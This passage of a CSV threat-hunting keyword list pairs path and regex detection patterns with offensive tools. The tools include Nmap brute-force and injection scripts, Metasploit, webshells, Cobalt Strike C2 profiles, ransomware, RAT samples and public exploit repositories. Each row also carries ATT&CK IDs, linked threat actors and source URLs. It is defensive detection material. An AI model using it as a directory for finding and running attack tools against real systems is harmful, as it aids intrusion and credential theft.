Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8185" "*/ip-geolocation-ipinfodb.nse*",".{0,1000}\/ip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8186" "*/ip-geolocation-map-bing.nse*",".{0,1000}\/ip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8187" "*/ip-geolocation-map-google.nse*",".{0,1000}\/ip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8188" "*/ip-geolocation-map-kml.nse*",".{0,1000}\/ip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8189" "*/ip-geolocation-maxmind.nse*",".{0,1000}\/ip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8190" "*/ip-https-discover.nse*",".{0,1000}\/ip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8191" "*/ipidseq.nse*",".{0,1000}\/ipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8192" "*/ipmi_passwords.txt*",".{0,1000}\/ipmi_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8193" "*/ipmi-brute.nse*",".{0,1000}\/ipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8194" "*/ipmi-cipher-zero.nse*",".{0,1000}\/ipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8195" "*/ipmi-version.nse*",".{0,1000}\/ipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8196" "*/IPPrintC2.git*",".{0,1000}\/IPPrintC2\.git.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","8197" "*/IPPrintC2.ps1*",".{0,1000}\/IPPrintC2\.ps1.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","8198" "*/ipv6-multicast-mld-list.nse*",".{0,1000}\/ipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8204" "*/ipv6-node-info.nse*",".{0,1000}\/ipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8205" "*/ipv6-ra-flood.nse*",".{0,1000}\/ipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8206" "*/irc-botnet-channels.nse*",".{0,1000}\/irc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8207" "*/irc-brute.nse*",".{0,1000}\/irc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8208" "*/irc-info.nse*",".{0,1000}\/irc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8209" "*/irc-sasl-brute.nse*",".{0,1000}\/irc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8210" "*/irc-unrealircd-backdoor.nse*",".{0,1000}\/irc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8211" "*/irs.exe*",".{0,1000}\/irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","8212" "*/iscsi-brute.nse*",".{0,1000}\/iscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8213" "*/iscsi-info.nse*",".{0,1000}\/iscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8214" "*/isns-info.nse*",".{0,1000}\/isns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8215" "*/itsdangerous.zip*",".{0,1000}\/itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8216" "*/itsecteam_shell.php*",".{0,1000}\/itsecteam_shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8217" "*/ItWasAllADream.git*",".{0,1000}\/ItWasAllADream\.git.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","8218" "*/Ivy/Cryptor*",".{0,1000}\/Ivy\/Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","8219" "*/Ivy/Loader/*",".{0,1000}\/Ivy\/Loader\/.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","8220" "*/jackdaw.exe",".{0,1000}\/jackdaw\.exe","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8221" "*/jackdaw.git*",".{0,1000}\/jackdaw\.git.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. 
store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8222" "*/jackdaw.zip",".{0,1000}\/jackdaw\.zip","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","8223" "*/jackit*",".{0,1000}\/jackit.{0,1000}","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastille's MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastille's team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
We stand on the shoulders of giants","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Exploitation tool","https://github.com/insecurityofthings/jackit","1","0","N/A","network exploitation tool","N/A","9","842","152","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z","8224" "*/jaff.profile*",".{0,1000}\/jaff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8225" "*/jas502n/CVE-2020-5902*",".{0,1000}\/jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","8226" "*/jasmin-ransomware.git*",".{0,1000}\/jasmin\-ransomware\.git.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","8227" "*/jasperloader.profile*",".{0,1000}\/jasperloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8228" "*/java/jndi/RMIRefServer.java*",".{0,1000}\/java\/jndi\/RMIRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","N/A","10","2682","733","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z","8229" "*/jdwp-exec.nse*",".{0,1000}\/jdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8230" "*/jdwp-info.nse*",".{0,1000}\/jdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8231" "*/jdwp-inject.nse*",".{0,1000}\/jdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8232" "*/jdwp-version.nse*",".{0,1000}\/jdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8233" "*/jecretz.git*",".{0,1000}\/jecretz\.git.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","8234" "*/jecretz.py*",".{0,1000}\/jecretz\.py.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","8235" "*/Jeringa.exe*",".{0,1000}\/Jeringa\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8236" "*/jiansiting/CVE-2020-5902*",".{0,1000}\/jiansiting\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 
